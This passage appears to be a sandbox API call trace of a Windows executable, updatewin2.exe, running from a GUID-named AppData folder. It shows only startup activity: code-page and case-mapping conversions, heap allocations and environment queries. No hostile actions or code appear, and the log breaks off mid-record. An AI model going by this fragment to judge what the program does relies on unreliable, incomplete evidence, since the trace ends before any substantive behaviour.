lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eb58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0130.735] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0130.735] GetLastError () returned 0x57 [0130.735] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0130.736] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0130.736] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e948, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0130.736] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f324, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x88\x95ç\x81`õ\x18", lpUsedDefaultChar=0x0) returned 256 [0130.736] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0130.736] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eb78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0130.736] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0130.736] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x18e968, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0130.736] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f224, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x88\x95ç\x81`õ\x18", lpUsedDefaultChar=0x0) returned 256 [0130.736] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x80) returned 0x29a3e8 [0130.736] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x417ca8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin2.exe")) returned 0x5f [0130.736] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xc8) returned 0x29c478 [0130.736] RtlInitializeSListHead (in: ListHead=0x417bc8 | out: ListHead=0x417bc8) [0130.736] GetLastError () returned 0x0 [0130.736] GetEnvironmentStringsW () returned 0x29c548* [0130.736] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xaca) returned 0x29d020 [0130.736] FreeEnvironmentStringsW (penv=0x29c548) returned 1 [0130.736] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x98) returned 0x29c548 [0130.736] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x3e) returned 0x29db10 [0130.736] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x6c) returned 0x29c5e8 [0130.736] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x6e) returned 0x29c660 [0130.736] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x78) returned 0x281180 [0130.736] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x62) returned 0x29c6d8 [0130.736] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x2e) returned 0x2852d0 [0130.736] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x48) returned 0x29c748 [0130.736] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28) returned 0x29a470 [0130.736] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a) returned 0x29c028 [0130.736] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4a) returned 0x29c798 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x72) returned 0x281200 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x30) returned 0x285308 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x2e) returned 0x285340 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1c) returned 0x29c050 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xd2) returned 0x29c7f0 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x7c) returned 0x29c8d0 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x36) returned 0x29c958 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x3a) returned 0x29db58 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x90) returned 0x29c998 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x24) returned 0x29ca30 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x30) returned 0x285378 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x36) returned 0x29ca60 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x48) returned 0x29caa0 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x52) returned 0x29caf0 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x3c) returned 0x29dba0 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x82) returned 0x29cb50 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x2e) returned 0x2853b0 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1e) returned 0x29c078 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x2c) returned 0x2853e8 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x54) returned 0x29cbe0 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x52) returned 0x29cc40 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x2a) returned 0x285420 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x3c) returned 0x29dbe8 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x54) returned 0x29cca0 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x24) returned 0x29cd00 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x30) returned 0x285458 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x8c) returned 0x29cd30 [0130.737] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29d020 | out: hHeap=0x270000) returned 1 [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x800) returned 0x29cdc8 [0130.737] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0130.737] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402b17) returned 0x404e49 [0130.737] GetStartupInfoW (in: lpStartupInfo=0x18f590 | out: lpStartupInfo=0x18f590*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0130.737] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1423) returned 0x29eaf8 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1423) returned 0x29ff28 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c118 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x29d5d0 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c140 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x30) returned 0x285490 [0130.738] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29d5d0 | out: hHeap=0x270000) returned 1 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c168 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x48) returned 0x29d5d0 [0130.738] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x285490 | out: hHeap=0x270000) returned 1 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c190 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x60) returned 0x29d620 [0130.738] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29d5d0 | out: hHeap=0x270000) returned 1 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x90) returned 0x29d688 [0130.738] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29d620 | out: hHeap=0x270000) returned 1 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c1b8 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xd8) returned 0x29d720 [0130.738] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29d688 | out: hHeap=0x270000) returned 1 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c1e0 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c208 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x138) returned 0x29d5d0 [0130.738] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29d720 | out: hHeap=0x270000) returned 1 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c230 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c258 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c280 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c2a8 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1c8) returned 0x29d710 [0130.738] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29d5d0 | out: hHeap=0x270000) returned 1 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c2d0 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c2f8 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c320 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c348 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x2a0) returned 0x2a1358 [0130.738] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29d710 | out: hHeap=0x270000) returned 1 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c370 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c398 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c3c0 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c3e8 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c410 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x29c438 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1618 [0130.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1640 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x3f0) returned 0x29d5d0 [0130.739] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1358 | out: hHeap=0x270000) returned 1 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1668 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1690 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a16b8 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a16e0 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1708 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1730 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1758 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1780 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a17a8 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x5e8) returned 0x2a1e00 [0130.739] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29d5d0 | out: hHeap=0x270000) returned 1 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a17d0 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a17f8 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1820 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1848 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1870 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1898 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a18c0 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a18e8 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1910 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1938 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x8d0) returned 0x2a23f0 [0130.739] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2a1e00 | out: hHeap=0x270000) returned 1 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1960 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1988 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a19b0 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a19d8 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1a00 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1a28 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1a50 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1a78 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1aa0 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1ac8 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1af0 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1b18 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1b40 [0130.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20) returned 0x2a1b68 [0130.739] 